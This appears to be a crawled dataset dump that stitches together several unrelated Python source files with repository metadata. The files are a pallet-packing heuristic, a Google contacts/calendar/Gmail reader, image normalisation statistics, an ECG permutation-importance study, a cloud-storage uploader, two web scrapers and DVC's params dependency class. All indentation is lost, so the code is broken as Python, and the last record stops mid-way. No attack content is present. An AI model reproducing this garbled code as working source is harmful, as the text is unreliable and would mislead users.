def exact_placement(rects, pallet):
rest_rects = list(rects)
while rest_rects:
rest_rects1 = pallet_exact_side_placement(rest_rects, pallet, side='max')
rest_rects2 = pallet_exact_side_placement(rest_rects1, pallet, side='min')
if len(rest_rects) == len(rest_rects2):
break
rest_rects = rest_rects2
return rest_rects
def rects_flatten(rects):
out = []
for r in rects:
if r.placed:
out.extend(rects_flatten(r.placed))
else:
out.append(r)
return out
def min_residue(WH, rects):
W, H = WH
min_r = None
min_residue_wh = WH
for r in rects:
placed_r = Rectangle.placed_build(W, H, r)
if placed_r:
residue_wh = placed_r.placed[0].free_wh
if residue_wh[0] * residue_wh[1] < min_residue_wh[0] * min_residue_wh[1]:
min_residue_wh = residue_wh
min_r = r
return min_r, min_residue_wh
def min_residue_placement(pallet, rects):
max_r, min_residue_wh = min_residue(pallet.free_wh, rects)
if not max_r or min_residue_wh[0] * min_residue_wh[1] > max_r.square:
return rects
rest_rects = [r for r in rects if r is not max_r]
r, _ = min_residue(min_residue_wh, rest_rects)
if not r:
pallet.place(max_r)
return rest_rects
return rects
def find_concat_pair(W, H, rects):
min_loss = 1
min_values = None
for i in range(len(rects)):
for j in range(i + 1, len(rects)):
cur_concat = Rectangle.min_concat(W, H, rects[i], rects[j])
if not cur_concat:
continue
cur_loss = cur_concat.free_square / min(rects[i].square, rects[j].square)
if cur_loss < min_loss:
min_loss = cur_loss
min_values = (i, j, cur_concat)
return min_values
def free_placement(pallet, rects):
rest_rects = list(rects)
while rest_rects:
W, H = pallet.free_wh
if not W * H:
break
concat_rects = exact_concat(rest_rects, W, H)
#print(f'concat_rects={concat_rects}')
rest_rects = exact_placement(concat_rects, pallet)
#print(f'exact_placement: rest_rects={rest_rects}, concat_rects={concat_rects}, pallet={pallet}')
if len(rest_rects) == len(concat_rects):
rest_rects2 = min_residue_placement(pallet, rest_rects)
if len(rest_rects2) == len(rest_rects):
find_values = find_concat_pair(W, H, rest_rects)
if not find_values:
#print(f'not find_concat_pair for rest_rects={rest_rects}')
break
i, j, concat_r = find_values
assert pallet.place(concat_r)
del rest_rects[j]
del rest_rects[i]
else:
rest_rects = rest_rects2
rest_rects = rects_flatten(rest_rects)
return rest_rects
def pallet_placement(pallet, rects):
rest_rects = free_placement(pallet, rects)
# placed = len(rects) - len(rest_rects)
# if placed:
# print(f'pallet: {pallet}, placed: {placed} \n')
for r in pallet.placed:
rest_rects = pallet_placement(r, rest_rects)
return rest_rects
def assign_coordinates(x, y, W, H, rects):
out_xywh = []
for r in rects:
if W == r.h or H == r.w:
r = r.transposed()
if not r.placed:
out_xywh.append((x, y, r.w, r.h))
#print(f'append {x,y,r.w,r.h}')
else:
out_xywh.extend(assign_coordinates(x, y, r.w, r.h, r.placed))
if W == r.w:
y += r.h
H -= r.h
elif H == r.h:
x += r.w
W -= r.w
else:
assert False, f'WH={W,H}, r={r}'
return out_xywh
|
yad439/pallet-packing
|
concat_baseline/concat_baseline.py
|
concat_baseline.py
|
py
| 11,602 |
python
|
en
|
code
| 0 |
github-code
|
6
|
[
{
"api_name": "collections.Counter",
"line_number": 154,
"usage_type": "call"
}
] |
19329693229
|
from google_auth_oauthlib.flow import InstalledAppFlow
from googleapiclient.discovery import build
from google.oauth2.credentials import Credentials
from google.auth.transport.requests import Request
import os
# All scopes together
ALL_SCOPES = [
'https://www.googleapis.com/auth/contacts.readonly',
'https://www.googleapis.com/auth/calendar.readonly',
'https://www.googleapis.com/auth/gmail.readonly'
]
CREDENTIALS_FILE = 'env/token.json'
def get_credentials(scopes):
creds = None
# Load credentials from the file if it exists
if os.path.exists(CREDENTIALS_FILE):
creds = Credentials.from_authorized_user_file(CREDENTIALS_FILE, scopes)
# Refresh or obtain new credentials
if not creds or not creds.valid:
if creds and creds.expired and creds.refresh_token:
creds.refresh(Request()) # Use `Request()` as the required argument for `refresh()`
else:
flow = InstalledAppFlow.from_client_secrets_file('env/oauth2_credentials.json', scopes)
creds = flow.run_local_server(port=0)
# Save the credentials for the next run
with open(CREDENTIALS_FILE, 'w') as token:
token.write(creds.to_json())
return creds
# Build the service using credentials
def get_authenticated_service(api, version, creds):
return build(api, version, credentials=creds)
# Fetch contacts
def get_contacts(creds):
service = get_authenticated_service('people', 'v1', creds)
results = service.people().connections().list(
resourceName='people/me',
personFields='names,emailAddresses'
).execute()
print("Data type of get_contacts results: ", type(results))
# print("First 500 characters of results: ", json.dumps(results, indent=4)[:500])
return results # Add this line
# Fetch calendar events
def get_calendar_events(creds):
service = get_authenticated_service('calendar', 'v3', creds)
results = service.events().list(calendarId='primary').execute()
print("Data type of get_calendar_events results: ", type(results))
# print("First 500 characters of results: ", json.dumps(results, indent=4)[:500])
return results # Add this line
# Fetch emails
def get_emails(creds):
service = get_authenticated_service('gmail', 'v1', creds)
results = service.users().messages().list(userId='me', maxResults=10).execute()
messages = results.get('messages', [])
full_messages = [] # List to hold the full message details
for message in messages:
msg = service.users().messages().get(userId='me', id=message['id']).execute()
full_messages.append(msg)
return full_messages
if __name__ == "__main__":
creds = get_credentials(ALL_SCOPES)
get_contacts(creds)
get_calendar_events(creds)
get_emails(creds)
|
clarkdever/gcal-gcontacts-sync
|
google_api_utils.py
|
google_api_utils.py
|
py
| 2,803 |
python
|
en
|
code
| 0 |
github-code
|
6
|
[
{
"api_name": "os.path.exists",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 20,
"usage_type": "attribute"
},
{
"api_name": "google.oauth2.credentials.Credentials.from_authorized_user_file",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "google.oauth2.credentials.Credentials",
"line_number": 21,
"usage_type": "name"
},
{
"api_name": "google.auth.transport.requests.Request",
"line_number": 26,
"usage_type": "call"
},
{
"api_name": "google_auth_oauthlib.flow.InstalledAppFlow.from_client_secrets_file",
"line_number": 28,
"usage_type": "call"
},
{
"api_name": "google_auth_oauthlib.flow.InstalledAppFlow",
"line_number": 28,
"usage_type": "name"
},
{
"api_name": "googleapiclient.discovery.build",
"line_number": 39,
"usage_type": "call"
}
] |
19969055167
|
"""
This helps in finding the means and standards of the images to normalize before training.
To run
python3 calculate_means_std.py -i path/to/image/folder/
"""
import argparse
import subprocess
import yaml
import os
import sys
sys.path.remove("/opt/ros/kinetic/lib/python2.7/dist-packages")
import cv2
import numpy as np
def is_image(filename):
return any(filename.endswith(ext) for ext in ['.jpg', '.png'])
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument(
'--image', '-i',
type=str,
required=True,
default=None,
help='Directory to get the images from. If not passed, do from scratch!'
)
FLAGS, unparsed = parser.parse_known_args()
# print summary of what we will do
print("----------")
print("INTERFACE:")
#
print("image dir", FLAGS.image)
print("----------\n")
print("----------\n")
#
# create list of images and examine their pixel values
filenames = [os.path.join(dp, f) for dp, dn, fn in os.walk(
os.path.expanduser(FLAGS.image)) for f in fn if is_image(f)]
# examine individually pixel values
counter = 0.0
pix_val = np.zeros(3, dtype=np.float)
for filename in filenames:
# analize
print("Accumulating mean", filename)
# open as rgb
cv_img = cv2.imread(filename, cv2.IMREAD_COLOR)
cv_img = cv2.cvtColor(cv_img, cv2.COLOR_BGR2RGB)
# normalize to 1
cv_img = cv_img.astype(np.float) / 255.0
# count pixels and add them to counter
h, w, d = cv_img.shape
counter += h * w
# sum to moving pix value counter in each channel
pix_val += np.sum(cv_img, (0, 1))
# calculate means
means = (pix_val / counter)
# means
print("means(rgb): ", means)
# pass again and calculate variance
pix_var = np.zeros(3, dtype=np.float)
for filename in filenames:
# analizel
print("Accumulating variance", filename)
# open as rgb
cv_img = cv2.imread(filename, cv2.IMREAD_COLOR)
cv_img = cv2.cvtColor(cv_img, cv2.COLOR_BGR2RGB)
# normalize to 1
cv_img = cv_img.astype(np.float) / 255.0
# sum to moving pix value counter in each channel
pix_var += np.sum(np.square(cv_img - means), (0, 1))
# calculate the standard deviations
stds = np.sqrt(pix_var / counter)
print("stds(rgb): ", stds)
# finalize by printing both
print("*" * 80)
print("means(rgb): ", means)
print("stds(rgb): ", stds)
print("*" * 80)
|
vijaysamula/Building_floor_counter
|
calculate_means_stds.py
|
calculate_means_stds.py
|
py
| 2,438 |
python
|
en
|
code
| 0 |
github-code
|
6
|
[
{
"api_name": "sys.path.remove",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "sys.path",
"line_number": 15,
"usage_type": "attribute"
},
{
"api_name": "argparse.ArgumentParser",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 48,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 48,
"usage_type": "attribute"
},
{
"api_name": "os.walk",
"line_number": 48,
"usage_type": "call"
},
{
"api_name": "os.path.expanduser",
"line_number": 49,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 49,
"usage_type": "attribute"
},
{
"api_name": "numpy.zeros",
"line_number": 53,
"usage_type": "call"
},
{
"api_name": "numpy.float",
"line_number": 53,
"usage_type": "attribute"
},
{
"api_name": "cv2.imread",
"line_number": 59,
"usage_type": "call"
},
{
"api_name": "cv2.IMREAD_COLOR",
"line_number": 59,
"usage_type": "attribute"
},
{
"api_name": "cv2.cvtColor",
"line_number": 60,
"usage_type": "call"
},
{
"api_name": "cv2.COLOR_BGR2RGB",
"line_number": 60,
"usage_type": "attribute"
},
{
"api_name": "numpy.float",
"line_number": 63,
"usage_type": "attribute"
},
{
"api_name": "numpy.sum",
"line_number": 70,
"usage_type": "call"
},
{
"api_name": "numpy.zeros",
"line_number": 79,
"usage_type": "call"
},
{
"api_name": "numpy.float",
"line_number": 79,
"usage_type": "attribute"
},
{
"api_name": "cv2.imread",
"line_number": 85,
"usage_type": "call"
},
{
"api_name": "cv2.IMREAD_COLOR",
"line_number": 85,
"usage_type": "attribute"
},
{
"api_name": "cv2.cvtColor",
"line_number": 86,
"usage_type": "call"
},
{
"api_name": "cv2.COLOR_BGR2RGB",
"line_number": 86,
"usage_type": "attribute"
},
{
"api_name": "numpy.float",
"line_number": 89,
"usage_type": "attribute"
},
{
"api_name": "numpy.sum",
"line_number": 92,
"usage_type": "call"
},
{
"api_name": "numpy.square",
"line_number": 92,
"usage_type": "call"
},
{
"api_name": "numpy.sqrt",
"line_number": 95,
"usage_type": "call"
}
] |
43367818416
|
# Importancia de la característica de permutación (PFI) para la clasificación de latidos utilizando un perceptrón multicapa (MLP)
#
#
# - Código 'PFI.py'
# - Trabajo Fin de Máster.
# - Néstor Bolaños Bolaños. ([email protected])
import warnings
warnings.filterwarnings("ignore")
import numpy as np
import pickle
import glob
import matplotlib.pyplot as plt
import pandas as pd
from scipy import *
import os
import seaborn as sns
import tensorflow as tf
from tensorflow.keras.utils import to_categorical
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Dense
from sklearn import *
from sklearn.metrics import *
from sklearn.model_selection import StratifiedKFold
sns.set()
# Cargamos los datos y codificamos las clases de cada latido mediante One Hot
# Cargamos los datos de entrenamiento y de test:
tamaño = 277
valores_train = np.empty(shape=[0, tamaño])
valores_test = np.empty(shape=[0, tamaño])
latidos_entrenamiento = glob.glob('train_beats.csv')
latidos_test = glob.glob('test_beats.csv')
for j in latidos_entrenamiento:
filas = np.loadtxt(j, delimiter=',')
valores_train = np.append(valores_train, filas, axis=0)
for j in latidos_test:
filas = np.loadtxt(j, delimiter=',')
valores_test = np.append(valores_test, filas, axis=0)
print(valores_train.shape)
print(valores_test.shape)
# Separamos los datos de entrenamiento y de test, y aplicamos la codificación One Hot a Y:
X_train = valores_train[:,:-2]
X_test = valores_test[:,:-2]
y_train = valores_train[:,-2]
y_test = valores_test[:,-2]
# Combinamos todo nuevamente:
X = np.concatenate((X_train, X_test), axis = 0)
Y = np.concatenate((y_train, y_test), axis = 0)
# codificación One Hot de Y:
Y = to_categorical(Y)
# Construimos el perceptrón multicapa
# Construimos el modelo MLP
def getModel():
model_mlp = Sequential()
model_mlp.add(Dense(100, activation = 'relu'))
model_mlp.add(Dense(9, activation = 'softmax'))
return model_mlp
model_mlp.summary()
# Implementamos y aplicamos PFI para el perceptrón multicapa
# Métodos de perturbación:
# Hay diferentes tipos de perturbación para la importancia de la característica de permutación, como la perturbación media, la perturbación cero y la perturbación aleatoria. En la implementación que hemos realizado en este cuaderno, los datos dentro de cada corte se han barajado aleatoriamente.
fig, ax = plt.subplots(1, 4, figsize = (20, 4), sharex = True, sharey=True)
# Sin perturbación: señal original.
ax[0].set_title('Sin perturbación')
ax[0].plot(np.arange(len( X[20, :])), X[20, :])
# perturbación 0: se establecen los valores de cada corte a 0.
ax[1].set_title('Perturbación 0')
X_zero_perturbed = X[20, :].copy()
X_zero_perturbed[5 * 25 : 6 * 25] = 0.0
ax[1].plot(np.arange(len(X[20, :])), X_zero_perturbed)
# Perturbación aleatoria: los valores de cada corte se reemplazan con valores aleatorios.
ax[2].set_title('Perturbación aleatoria')
X_random_perturbed = X[20, :].copy()
X_random_perturbed[5 * 25 : 6 * 25] = np.std(X[20, :]) * np.random.randn(25) + np.mean(X[20, :])
ax[2].plot(np.arange(len(X[20, :])), X_random_perturbed)
# Perturbación media: se promedian los valores del corte actual.
ax[3].set_title('Perturbación Media')
X_mean_perturbed = X[20, :].copy()
X_mean_perturbed[5 * 25 : 6 * 25] = np.mean(X[20, 5 * 25 : 6 * 25])
ax[3].plot(np.arange(len(X[20, :])), X_mean_perturbed)
for i in range(4):
ax[i].set_xlabel('Tiempo')
ax[i].axvspan(5 * 25, 6 * 25, color = 'green', alpha = 0.25)
# Importancia de la característica de permutación:
kf = StratifiedKFold(n_splits = 5, shuffle = True)
contador_pliegues = 0
M = np.zeros((X.shape[0], 11))
for indice_train, indice_test in kf.split(X, np.argmax(Y, axis = 1)):
print('Fold ', contador_pliegues)
# Separamos los datos en cada pliegue:
X_train, X_test = X[indice_train], X[indice_test]
y_train, y_test = Y[indice_train], Y[indice_test]
# Construimos el modelo de aprendizaje con los datos de entrenamiento:
model_mlp = getModel()
model_mlp.compile(optimizer = 'adam', loss = tf.keras.losses.CategoricalCrossentropy())
model_mlp.fit(X_train, y_train, epochs = 100, verbose = 0)
# Realizamos predicciones con los datos de test sin permutaciones:
predicciones = model_mlp.predict(X_test)
# Para cada característica:
for corte in range(0, 275, 25):
# Permutamos y realizamos predicciones:
x_permutacion = np.copy(X_test)
x_corte = X_test[:, corte:corte+25]
x_corte_permutacion = np.random.permutation(x_corte)
x_permutacion[:, corte:corte + 25] = x_corte_permutacion
pred_perm = model_mlp.predict(x_permutacion)
# Obtenemos la importancia:
importancia = ((np.argmax(y_test, axis = 1) - np.argmax(pred_perm, axis = 1))**2
- (np.argmax(y_test, axis = 1) - np.argmax(predicciones, axis = 1))**2)
M[indice_test, corte // 25] = importancia
contador_pliegues += 1
importancia_media = np.mean(M, axis = 0)
indices_ordenados = np.argsort(-1 * importancia_media)
cortes = np.arange(1, 12)
colores = ['forestgreen', 'limegreen', 'royalblue', 'blue', 'darkorange', 'cyan', 'purple', 'red', 'pink', 'yellow', 'coral']
fig, ax = plt.subplots(1, 2, figsize = (15, 4))
ax[0].bar(range(11), importancia_media[indices_ordenados], color = np.array(colores)[indices_ordenados])
ax[0].set_title('Importancia de cada característica del modelo MLP')
ax[0].set_xticks(np.arange(11))
ax[0].set_xticklabels(cortes[indices_ordenados].astype(int))
ax[0].set_xlabel('Corte')
ax[0].set_ylabel('Importancia de cada característica')
ecg_normalizado = (X[20, :] - X[20, :].min()) / (X[20, :].max() - X[20, :].min())
Importancia_caraceristica_normalizada = (importancia_media - importancia_media.min()) / (importancia_media.max() - importancia_media.min())
ax[1].plot(np.arange(len(ecg_normalizado)), ecg_normalizado, label='Datos ECG')
ax[1].plot(np.repeat(Importancia_caraceristica_normalizada, 25), label = 'Importancia de cada característica')
ax[1].set_title('Importancia de cada característica \npara el modelo MLP en una muestra de ECG')
ax[1].set_xlabel('Tiempo')
ax[1].set_ylabel('Señal ECG / Importancia de cada característica')
ax[1].legend()
|
Nestructor/Codigo_TFM_Aplicacion-del-Aprendizaje-Profundo-en-la-toma-de-Decisiones-Clinicas-Informadas
|
PFI.py
|
PFI.py
|
py
| 6,333 |
python
|
es
|
code
| 0 |
github-code
|
6
|
[
{
"api_name": "warnings.filterwarnings",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "seaborn.set",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "numpy.empty",
"line_number": 32,
"usage_type": "call"
},
{
"api_name": "numpy.empty",
"line_number": 33,
"usage_type": "call"
},
{
"api_name": "glob.glob",
"line_number": 35,
"usage_type": "call"
},
{
"api_name": "glob.glob",
"line_number": 36,
"usage_type": "call"
},
{
"api_name": "numpy.loadtxt",
"line_number": 39,
"usage_type": "call"
},
{
"api_name": "numpy.append",
"line_number": 40,
"usage_type": "call"
},
{
"api_name": "numpy.loadtxt",
"line_number": 43,
"usage_type": "call"
},
{
"api_name": "numpy.append",
"line_number": 44,
"usage_type": "call"
},
{
"api_name": "numpy.concatenate",
"line_number": 56,
"usage_type": "call"
},
{
"api_name": "numpy.concatenate",
"line_number": 57,
"usage_type": "call"
},
{
"api_name": "tensorflow.keras.utils.to_categorical",
"line_number": 60,
"usage_type": "call"
},
{
"api_name": "tensorflow.keras.models.Sequential",
"line_number": 67,
"usage_type": "call"
},
{
"api_name": "tensorflow.keras.layers.Dense",
"line_number": 68,
"usage_type": "call"
},
{
"api_name": "tensorflow.keras.layers.Dense",
"line_number": 69,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot.subplots",
"line_number": 80,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 80,
"usage_type": "name"
},
{
"api_name": "numpy.arange",
"line_number": 84,
"usage_type": "call"
},
{
"api_name": "numpy.arange",
"line_number": 90,
"usage_type": "call"
},
{
"api_name": "numpy.std",
"line_number": 95,
"usage_type": "call"
},
{
"api_name": "numpy.random.randn",
"line_number": 95,
"usage_type": "call"
},
{
"api_name": "numpy.random",
"line_number": 95,
"usage_type": "attribute"
},
{
"api_name": "numpy.mean",
"line_number": 95,
"usage_type": "call"
},
{
"api_name": "numpy.arange",
"line_number": 96,
"usage_type": "call"
},
{
"api_name": "numpy.mean",
"line_number": 101,
"usage_type": "call"
},
{
"api_name": "numpy.arange",
"line_number": 102,
"usage_type": "call"
},
{
"api_name": "sklearn.model_selection.StratifiedKFold",
"line_number": 109,
"usage_type": "call"
},
{
"api_name": "numpy.zeros",
"line_number": 111,
"usage_type": "call"
},
{
"api_name": "numpy.argmax",
"line_number": 112,
"usage_type": "call"
},
{
"api_name": "tensorflow.keras.losses.CategoricalCrossentropy",
"line_number": 121,
"usage_type": "call"
},
{
"api_name": "tensorflow.keras",
"line_number": 121,
"usage_type": "attribute"
},
{
"api_name": "numpy.copy",
"line_number": 130,
"usage_type": "call"
},
{
"api_name": "numpy.random.permutation",
"line_number": 132,
"usage_type": "call"
},
{
"api_name": "numpy.random",
"line_number": 132,
"usage_type": "attribute"
},
{
"api_name": "numpy.argmax",
"line_number": 137,
"usage_type": "call"
},
{
"api_name": "numpy.argmax",
"line_number": 138,
"usage_type": "call"
},
{
"api_name": "numpy.mean",
"line_number": 141,
"usage_type": "call"
},
{
"api_name": "numpy.argsort",
"line_number": 143,
"usage_type": "call"
},
{
"api_name": "numpy.arange",
"line_number": 144,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot.subplots",
"line_number": 147,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 147,
"usage_type": "name"
},
{
"api_name": "numpy.array",
"line_number": 148,
"usage_type": "call"
},
{
"api_name": "numpy.arange",
"line_number": 150,
"usage_type": "call"
},
{
"api_name": "numpy.arange",
"line_number": 157,
"usage_type": "call"
},
{
"api_name": "numpy.repeat",
"line_number": 158,
"usage_type": "call"
}
] |
33708620212
|
import os
from google.cloud import storage
class GoogleStorageLoader():
def __init__(self) -> None:
"""Start Google Cloud clint - could be used for uploading to storage
"""
os.environ["GOOGLE_APPLICATION_CREDENTIALS"] = "../content/key-bucket.json"
self.client = storage.Client()
def upload_to_bucket(self, bucket_name, source_file, destination):
"""uploads file to the bucket
Args:
bucket_name (str): _description_
source_file (str): _description_
destination (str): _description_
"""
bucket = self.client.bucket(bucket_name)
blob = bucket.blob(destination)
blob.upload_from_filename(source_file)
|
IhorLuk/reddit_api_data_ingestion
|
src/storage.py
|
storage.py
|
py
| 724 |
python
|
en
|
code
| 0 |
github-code
|
6
|
[
{
"api_name": "os.environ",
"line_number": 8,
"usage_type": "attribute"
},
{
"api_name": "google.cloud.storage.Client",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "google.cloud.storage",
"line_number": 9,
"usage_type": "name"
}
] |
13454184469
|
"""
words list가 링크만 있고, 글자 데이터가 없음. 글자 리스트를 받아오기 위한 파일
"""
from selenium import webdriver
from bs4 import BeautifulSoup
import pandas as pd
class Get_chndic_data:
def __init__(self, link):
self.link = link
self.get_data = []
def beautiful_soup(self, link):
"""
Beautiful Soup Type의 객체를 return
return값에 다음과 같은 메소드 가능
data = soup.find('div', id='container').find('div', class_='section_hsk')
:param link: https://zh.dict.naver.com/ 뒤에 들어갈 {letter_link} 주소
:return: row 데이터
"""
chrome_options = webdriver.ChromeOptions()
chrome_options.add_argument('headless')
chrome_options.add_argument('window-size=1920x1080')
chrome_options.add_argument("disable-gpu")
# https://beomi.github.io/2017/09/28/HowToMakeWebCrawler-Headless-Chrome/
# driver = webdriver.Chrome("D:/dev/chromedriver.exe", chrome_options=chrome_options) # 집에서 chromedriver 경로
driver = webdriver.Chrome("C:/Users/user/Downloads/chromedriver.exe", chrome_options=chrome_options)
# 학원에서 chromedriver 경로
url = f'https://zh.dict.naver.com/{link}'
driver.get(url)
driver.minimize_window()
content = driver.page_source.encode('utf-8').strip()
soup = BeautifulSoup(content, "html.parser")
driver.close()
return soup
def find_letter_inf(self):
"""
글자 link를 이용해 글자와 글자 뜻, 병음, 단어일 경우 구성 글자와 구성 글자 링크를 받아옴
:return: 위 자료로 구성된 list
"""
# 병음 추가해야 함.
soup = self.beautiful_soup(self.link)
letter = soup.find('div', id='container').find('div', class_="section section_entry _section_entry") \
.find('div', class_="entry_title _guide_lang").find('strong', class_='word').text
return letter
temp_df = pd.read_csv('../csv/hsk_words_listed.csv', encoding='UTF-8')
hsk_words_link = temp_df.iloc[:, 1]
index = 500
get_data_list = []
########################################## 파일명 변환 ##################################
for i in range(3000, 3100):
while True:
try:
get_data = Get_chndic_data(hsk_words_link[i])
get_data_list.append(get_data.find_letter_inf())
df = pd.DataFrame(get_data_list)
print(df.tail())
df.to_csv(f'../csv/letters_list{3000}.csv')
break
except AttributeError:
print('try again')
continue
|
i-hs/chn_words_crawling
|
make_database/words_list.py
|
words_list.py
|
py
| 2,691 |
python
|
ko
|
code
| 0 |
github-code
|
6
|
[
{
"api_name": "selenium.webdriver.ChromeOptions",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "selenium.webdriver",
"line_number": 24,
"usage_type": "name"
},
{
"api_name": "selenium.webdriver.Chrome",
"line_number": 31,
"usage_type": "call"
},
{
"api_name": "selenium.webdriver",
"line_number": 31,
"usage_type": "name"
},
{
"api_name": "bs4.BeautifulSoup",
"line_number": 37,
"usage_type": "call"
},
{
"api_name": "pandas.read_csv",
"line_number": 53,
"usage_type": "call"
},
{
"api_name": "pandas.DataFrame",
"line_number": 64,
"usage_type": "call"
}
] |
42072257921
|
#!/usr/bin/env python
# coding: utf-8
# In[36]:
import requests
from bs4 import BeautifulSoup
import pandas
list1=[]
for page in range(0,30,10):
r = requests.get("http://www.pyclass.com/real-estate/rock-springs-wy/LCWYROCKSPRINGS/t=0&s="+str(page)+".html", headers={'User-agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:61.0) Gecko/20100101 Firefox/61.0'})
c= r.content
soup=BeautifulSoup(c,"html.parser")
all=soup.find_all("div",{"class":"propertyRow"})
x=all[0].find("h4",{"class":"propPrice"}).text
for item in all:
d={}
d["Address"]=item.find_all("span",{"class":"propAddressCollapse"})[0].text
try:
d["Locality"]=item.find_all("span",{"class":"propAddressCollapse"})[1].text
except:
d["Locality"]=None
d["Price"]=item.find("h4",{"class":"propPrice"}).text.replace("\n","").strip()
try:
d["Beds"]=item.find("span",{"class":"infoBed"}).find("b").text
except:
d["Beds"]=None
try:
d["Area"]=item.find("span",{"class":"infoSqFt"}).find("b").text
except:
d["Area"]=None
try:
d["Full Baths"]=item.find("span",{"class":"infoValueFullBath"}).find("b").text
except:
d["Full Baths"]=None
try:
d["Half Baths"]=item.find("span",{"class":"infoValueHalfBath"}).find("b").text
except:
d["Half Baths"]=None
for column_group in item.find_all("div",{"class":"columnGroup"}):
for fg , fn in zip(column_group.find_all("span",{"class":"featureGroup"}),column_group.find_all("span",{"class":"featureName"})):
if "Lot Size" in fg.text :
d["Lot Size"]=fn.text
list1.append(d)
df=pandas.DataFrame(list1)
df.to_csv("output.csv")
|
shivangijain827/python-projects
|
web - scraper/main.py
|
main.py
|
py
| 1,883 |
python
|
en
|
code
| 0 |
github-code
|
6
|
[
{
"api_name": "requests.get",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "bs4.BeautifulSoup",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "pandas.DataFrame",
"line_number": 63,
"usage_type": "call"
}
] |
3477283820
|
import logging
import os
import typing
from collections import defaultdict
from typing import Dict
import dpath.util
from voluptuous import Any
from dvc.exceptions import DvcException
from dvc.utils.serialize import ParseError, load_path
from dvc_data.hashfile.hash_info import HashInfo
from .base import Dependency
logger = logging.getLogger(__name__)
class MissingParamsError(DvcException):
pass
class MissingParamsFile(DvcException):
pass
class ParamsIsADirectoryError(DvcException):
pass
class BadParamFileError(DvcException):
pass
class ParamsDependency(Dependency):
PARAM_PARAMS = "params"
PARAM_SCHEMA = {PARAM_PARAMS: Any(dict, list, None)}
DEFAULT_PARAMS_FILE = "params.yaml"
def __init__(self, stage, path, params=None, repo=None):
self.params = list(params) if params else []
info = (
{self.PARAM_PARAMS: params} if isinstance(params, dict) else None
)
repo = repo or stage.repo
path = path or os.path.join(repo.root_dir, self.DEFAULT_PARAMS_FILE)
super().__init__(stage, path, info=info, repo=repo)
def dumpd(self):
ret = super().dumpd()
if not self.hash_info:
ret[self.PARAM_PARAMS] = self.params or {}
return ret
def fill_values(self, values=None):
"""Load params values dynamically."""
if values is None:
return
info = {}
if not self.params:
info.update(values)
for param in self.params:
if param in values:
info[param] = values[param]
self.hash_info = HashInfo(self.PARAM_PARAMS, info)
def read_params(
self, flatten: bool = True, **kwargs: typing.Any
) -> Dict[str, typing.Any]:
try:
config = self.read_file()
except MissingParamsFile:
config = {}
if not self.params:
return config
ret = {}
if flatten:
for param in self.params:
try:
ret[param] = dpath.util.get(config, param, separator=".")
except KeyError:
continue
return ret
from dpath.util import merge
for param in self.params:
merge(
ret,
dpath.util.search(config, param, separator="."),
separator=".",
)
return ret
def workspace_status(self):
if not self.exists:
return {str(self): "deleted"}
if self.hash_info.value is None:
return {str(self): "new"}
from funcy import ldistinct
status = defaultdict(dict)
info = self.hash_info.value if self.hash_info else {}
actual = self.read_params()
# NOTE: we want to preserve the order of params as specified in the
# status. In case of tracking the whole file, the order is top-level
# keys in the file and then the keys in the `info` from `dvc.lock`
# (which are alphabetically sorted).
params = self.params or ldistinct([*actual.keys(), *info.keys()])
for param in params:
if param not in actual:
st = "deleted"
elif param not in info:
st = "new"
elif actual[param] != info[param]:
st = "modified"
else:
assert actual[param] == info[param]
continue
status[str(self)][param] = st
return status
def status(self):
return self.workspace_status()
def validate_filepath(self):
if not self.exists:
raise MissingParamsFile(f"Parameters file '{self}' does not exist")
if self.isdir():
raise ParamsIsADirectoryError(
f"'{self}' is a directory, expected a parameters file"
)
def read_file(self):
self.validate_filepath()
try:
return load_path(self.fs_path, self.repo.fs)
except ParseError as exc:
raise BadParamFileError(
f"Unable to read parameters from '{self}'"
) from exc
def get_hash(self):
info = self.read_params()
missing_params = set(self.params) - set(info.keys())
if missing_params:
raise MissingParamsError(
"Parameters '{}' are missing from '{}'.".format(
", ".join(missing_params), self
)
)
return HashInfo(self.PARAM_PARAMS, info)
def save(self):
if not self.exists:
raise self.DoesNotExistError(self)
if not self.isfile and not self.isdir:
raise self.IsNotFileOrDirError(self)
self.ignore()
self.hash_info = self.get_hash()
|
gshanko125298/Prompt-Engineering-In-context-learning-with-GPT-3-and-LLMs
|
myenve/Lib/site-packages/dvc/dependency/param.py
|
param.py
|
py
| 4,814 |
python
|
en
|
code
| 3 |
github-code
|
6
|
[
{
"api_name": "logging.getLogger",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "dvc.exceptions.DvcException",
"line_number": 19,
"usage_type": "name"
},
{
"api_name": "dvc.exceptions.DvcException",
"line_number": 23,
"usage_type": "name"
},
{
"api_name": "dvc.exceptions.DvcException",
"line_number": 27,
"usage_type": "name"
},
{
"api_name": "dvc.exceptions.DvcException",
"line_number": 31,
"usage_type": "name"
},
{
"api_name": "base.Dependency",
"line_number": 35,
"usage_type": "name"
},
{
"api_name": "voluptuous.Any",
"line_number": 37,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 46,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 46,
"usage_type": "attribute"
},
{
"api_name": "dvc_data.hashfile.hash_info.HashInfo",
"line_number": 66,
"usage_type": "call"
},
{
"api_name": "typing.Any",
"line_number": 69,
"usage_type": "attribute"
},
{
"api_name": "dpath.util.util.get",
"line_number": 83,
"usage_type": "call"
},
{
"api_name": "dpath.util.util",
"line_number": 83,
"usage_type": "attribute"
},
{
"api_name": "dpath.util",
"line_number": 83,
"usage_type": "name"
},
{
"api_name": "dpath.util.merge",
"line_number": 91,
